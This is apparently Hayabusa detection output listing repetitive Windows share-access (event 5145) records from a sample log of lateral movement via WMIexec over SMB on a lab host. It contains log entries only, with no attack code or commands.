2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 